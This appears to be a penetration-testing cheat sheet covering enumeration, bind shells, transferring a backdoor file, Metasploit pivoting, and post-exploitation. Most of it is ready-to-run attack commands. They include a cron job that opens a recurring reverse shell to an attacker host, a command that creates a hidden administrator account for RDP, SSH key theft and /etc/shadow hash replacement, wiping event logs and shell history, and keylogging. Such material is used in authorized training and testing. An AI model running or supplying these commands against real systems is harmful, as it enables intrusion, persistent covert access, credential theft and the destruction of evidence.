```shell
ctrl+c          # Terminate the currently running command
ctrl+r          # Search the current terminal session's command history
ctrl+a          # Go to the start of the line
ctrl+e          # Go to the end of the line
ctrl+z          # Suspend (stop) the foreground program; resume it with fg

# Files
base64 -w0 file.txt                 # Encode file to Base64 (single line)
wc -l file.txt                      # Count lines
wc -c file.txt                      # Count bytes
cat file.txt | sort | uniq          # Sort and delete duplicate lines
sed -i 's/OLD/NEW/g' file.txt       # Replace a string inside a file (in place)
ls -al /etc/cron*                   # List all files and directories that start with cron
cat /etc/cron*                      # Display the contents of all cron* files

# Decompress
7z x file.7z              # .7z  ("x" extracts with full paths; "-x" is the exclude switch)
bzip2 -d file.bz2         # .bz2
gunzip file.gz            # .gz
tar -xvzf file.tar.gz     # .tar.gz
tar -jxf file.tar.bz2     # .tar.bz2
tar -xvjf file.tbz        # .tbz
tar -xvzf file.tgz        # .tgz
unzip file.zip            # .zip
unxz file.xz              # .xz (apt install xz-utils)

# Clipboard
xclip -sel c < file.txt   # Copy the file contents to the X clipboard

# Search strings inside files
grep -ri password                   # Search "password" (case insensitive) in all subdirectories
grep -Ei 'pass|user' file.txt       # Search "pass" or "user" in file.txt
grep -Eri 'pass|user'               # Search "pass" or "user" in all subdirectories
# with color, ignore binaries (-I), print line numbers (-n) and discard errors (permission denied)
grep --color=auto -rn -iIE "PASSW|PWD" 2>/dev/null

# Change user: root
su
# Change user: <username>
su <username>
# Generate a password hash for a Linux user (copy the output and paste it into the user's /etc/shadow entry)
openssl passwd -1 -salt <salt> <new_pass>   # -1 is MD5-crypt (weakest), -6 is SHA-512-crypt (strongest)
```
Enumeration
```shell
# System info
cat /etc/os-release     # Print Linux distro version
cat /etc/issue          # Print Linux distro version
lsb_release -a          # Print Linux distro version
uname -a                # Print kernel version, architecture and hostname
env                     # Print environment variables
lscpu                   # Hardware info
free -h                 # RAM usage
df -h                   # Disk usage
dpkg -l                 # List installed packages with version (Debian-based)

# Enumerate users
whoami
groups <user>
useradd -m <user> -s /bin/bash    # Creates a user with a home directory and bash as shell
usermod -aG root <user>           # Add <user> to the root group
lastlog                           # Most recent login of every user
last                              # Log of users logged in (reads /var/log/wtmp)

# Enumerate network
ip a                     # Interfaces and addresses; useful also to discover other networks
cat /etc/hostname        # Display hostname
cat /etc/hosts           # Maps IP addresses to domains (useful to discover internal domains you can access)
cat /etc/resolv.conf     # Display the DNS server (many times it is the default gateway)
netstat -tulpn           # Display listening TCP/UDP sockets with owning PID (ss -tulpn on newer systems)
arp -a                   # Display the host ARP cache
route                    # View and modify the routing table (ip route on newer systems)
# Note: the gateway is important... it can be a DNS server, DHCP server or all in one

# Processes & services
ps aux        # Display all processes; output is truncated to the window width
ps auxw       # Use 132 columns to display info, instead of the window width
ps auxww      # ps will use as many columns as necessary
top           # Dynamic real-time view of a running system (like Task Manager)
crontab -l    # Display the cronjobs of the current user (root's when run as root)
```
Windows
```batch
:: System info
systeminfo
:: Get current user
whoami
:: Get current user privileges
whoami /priv
:: Get installed updates. Useful to see which security patches are present
wmic qfe get Caption,HotFixID,InstalledOn,Description
:: Adds, displays, or modifies local groups
net localgroup
:: List the members of a local group -> net localgroup administrators
net localgroup <group>
:: Get user info
net user <user>
:: Network info
ipconfig /all
:: Lists info on tcp/udp ports with the owning PID
netstat -ano
:: Shows firewall status
netsh advfirewall show allprofiles
:: Display ARP table (ARP cache to discover other IP addresses on the target network)
arp -a
:: Print route table (useful during the pivoting phase of post-exploitation as it can reveal network routes)
route print
:: Processes & Services
:: Lists running services
net start
:: Same as above with extra details like PID, state, etc.
wmic service list brief
:: Stop a service
net stop <servicename>
:: List processes with their respective services
tasklist /svc
:: List scheduled tasks
schtasks /query /fo list /v
:: Automation: JAWS - https://github.com/411Hall/JAWS
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
:: Change Windows user password
net user <username> <new_pass>
```
Bind Shell
This type of shell is not preferred: the target has to open a listening port and the attacker connects to it directly, and in most cases ingress traffic to the target is blocked by a firewall or flagged as suspicious.
```shell
# Windows (target)
nc -nvlp <target_port> -e cmd.exe
nc.exe -nvlp <target_port> -e cmd.exe
# Linux (target)
nc -nvlp <target_port> -e /bin/bash
# Note: "-e" exists in netcat-traditional and ncat; the OpenBSD nc does not have it
# Linux (attacker)
nc -nv <target_ip> <target_port>
# Windows (attacker)
nc.exe -nv <target_ip> <target_port>
# Linux Metasploit (attacker)
use multi/handler
set payload generic/shell_bind_tcp     # Try also "linux/x64/shell_bind_tcp"
set rhost <target_ip>
set lport <target_port>
run
```
Transfer files
```shell
# Start web server
python3 -m http.server 8080
python2 -m SimpleHTTPServer 8080
php -S 0.0.0.0:8080        # bind to 0.0.0.0, not 127.0.0.1, or the target cannot reach it
# Download (HTTP Windows)
certutil -urlcache -f http://<host>/backdoor.php backdoor.php
# Download (HTTP Linux)
wget http://<host>/backdoor.php
# Netcat [useful when the victim cannot reach you, but you can]
nc -nvlp <target_port> > backdoor.php          # [recipient]
nc -w3 <ip> <target_port> < backdoor.php       # [sender]
# With base64 (works over any channel where you can paste text)
cat file | base64 -w0                       # get base64 [output is a single continuous line]
echo <output_base64> | base64 -d > file     # create file
# Tips
# Tip 1 - Progress indicator in netcat
pv backdoor.php | nc -w3 <ip> <target_port>    # [sender] (install pv)
# Tip 2 - Check the hash on both sides to detect a truncated or corrupted transfer
md5sum backdoor.php
# Note: netcat "-n" option means no DNS (only IP)
```
[Fully] interactive shell
Interactive shell
```shell
/bin/bash -i    # Linux
```
Fully interactive shell
```shell
# Step 1: spawn a pty inside the reverse shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
# Step 2: press CTRL+Z to background the shell and get back to your own terminal
CTRL+Z
# Step 3: on your own terminal, put it in raw mode (no local echo) and foreground the shell
stty raw -echo; fg
# Step 4: inside the shell
export TERM=xterm
# Note: if the size is wrong, check "stty size" locally and set the same rows/cols in the shell
```
Automatic
```shell
# https://github.com/brightio/penelope
# Currently only Unix shells are fully supported.
# There's basic support (netcat-like interaction + logging) for the rest
./penelope.py <port>                 # Reverse shell (listener)
./penelope.py -c <target> <port>     # Bind shell (connect)
```
Pivoting & Port forwarding
Metasploit (meterpreter) - Autoroute: any time we want to contact a machine within one of the specified networks, the traffic goes through the meterpreter session, which is used to reach the targets.
```shell
# Find the subnet (the 2nd target host may be in another network)
ipconfig        # Ex: IP: 19.9.29.148, Netmask: 255.255.240.0 -> network 19.9.16.0/20
# Add routes
run autoroute -s <subnet>       # Ex: run autoroute -s 19.9.16.0/20
# Display the active routing table
run autoroute -p
# Now you can perform a scan: auxiliary/scanner/portscan/tcp
```
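Turning the IP and netmask from `ipconfig` into the `<subnet>` argument for autoroute is where mistakes creep in (a /20 does not start at the host's third octet). The helper below is an added example, not part of the original cheat sheet or of Metasploit: it computes the network address and prefix length in plain POSIX shell arithmetic and rejects a non-contiguous mask. The function names (`ip_to_int`, `int_to_ip`, `prefix_len`, `subnet_of`) are this example's own.

```shell
#!/bin/sh
# Convert dotted-decimal IPv4 to a 32-bit integer: ip_to_int 10.0.0.1 -> 167772161
ip_to_int() {
    oldifs=$IFS; IFS=.
    set -- $1
    IFS=$oldifs
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# Convert a 32-bit integer back to dotted decimal
int_to_ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# prefix_len 255.255.240.0 -> 20
# Counts leading one bits; fails if any lower bit is set (mask not contiguous).
prefix_len() {
    m=$(ip_to_int "$1")
    n=0
    while [ $n -lt 32 ] && [ $(( (m >> (31 - n)) & 1 )) -eq 1 ]; do
        n=$((n + 1))
    done
    if [ $(( m & ((1 << (32 - n)) - 1) )) -ne 0 ]; then
        echo "invalid netmask: $1" >&2
        return 1
    fi
    echo $n
}

# subnet_of IP NETMASK -> network/prefix, ready for "run autoroute -s"
# subnet_of 19.9.29.148 255.255.240.0 -> 19.9.16.0/20
subnet_of() {
    ip=$(ip_to_int "$1")
    mask=$(ip_to_int "$2")
    plen=$(prefix_len "$2") || return 1
    echo "$(int_to_ip $(( ip & mask )))/$plen"
}

# Usage with the host shown in the ipconfig example above
subnet_of 19.9.29.148 255.255.240.0
```

Pipe the result straight into the console, e.g. `run autoroute -s $(subnet_of 19.9.29.148 255.255.240.0)`, instead of guessing the boundary by hand.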
Notes
Scanning with Metasploit is limited (we can't discover software versions, etc.), so it's better to use nmap. To reach the second target with nmap we need to perform port forwarding.
Since target_sys_2 does not have a route back to attacker_sys, when you use an exploit against it, pick a bind shell payload so the connection goes through the pivot. Ex: windows/meterpreter/bind_tcp
Port forwarding (meterpreter/metasploit)
```shell
# Forward a remote port to a local port. Here, we want to scan port 80 of target 2
portfwd add -l 1234 -p 80 -r <target_sys_2_ip>
portfwd list
nmap -sV -sC -p 1234 localhost
```
Persistence
Windows
(1) Metasploit module: search the persistence modules (Windows). Ex: exploit/windows/local/persistence_service (requires admin or SYSTEM privileges). When you want to connect again, start a listener (multi/handler with the same payload) to receive the connection.
(2) Enable RDP
First way, with Metasploit: search enable_rdp (post/windows/manage/enable_rdp), set the session and run it. Then connect to the victim with an RDP client.
Note: you need a username and password. If you don't have the password, change it with net user <username> <new_pass> (suspicious in a real environment and breaks the user's access), crack the NTLM hash, or create a new account and add it to the Administrators group.
Second way with metasploit/meterpreter (auto create account and settings):
```shell
# In meterpreter (getgui is an older script; post/windows/manage/enable_rdp is the maintained module)
run getgui -e -u user_you_want -p password_you_want
# This enables the RDP service ->
# Creates a new user with the provided parameters ->
# Hides the user from the Windows login screen ->
# Adds the user to the Remote Desktop Users and Administrators groups
```
Linux
(1) Metasploit: search the persistence modules (Linux). Example: post/linux/manage/sshkey_persistence (needs elevated privileges; this module adds an SSH key to a specified user).
(2) Via SSH key: after gaining access to the Linux system, you can transfer an existing SSH private key to your local machine and use it to connect via SSH.
(3) With cron jobs
```shell
# 1. Set up a listener on <attacker_ip>:<port>
# 2. Create a cronjob (the five asterisks mean "every minute")
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1'" > cron
# 3. This REPLACES the user's existing crontab with the contents of 'cron'
#    (if the user already has entries, merge the output of "crontab -l" into 'cron' first)
crontab cron
# Show the crontab for the current user
crontab -l
# NOTE: if the command doesn't work try another revshell (e.g. the target bash may lack /dev/tcp)
```
Clearing tracks
Windows
```shell
# Metasploit/Meterpreter
clearev    # Clear the Application, System, and Security event logs on a Windows system
```
Linux
```shell
history -c                      # Clear the history held in memory by the current shell
cat /dev/null > ~/.bash_history # Truncate the history file on disk
# Note: bash writes its in-memory history to the file when the session exits, so truncate the
# file and clear the in-memory history (or point HISTFILE elsewhere) before logging out
```
Keylogger
```shell
# With metasploit (meterpreter)
keyscan_start    # Start the keylogger
keyscan_dump     # Print the captured keystrokes
keyscan_stop     # Stop the keylogger
```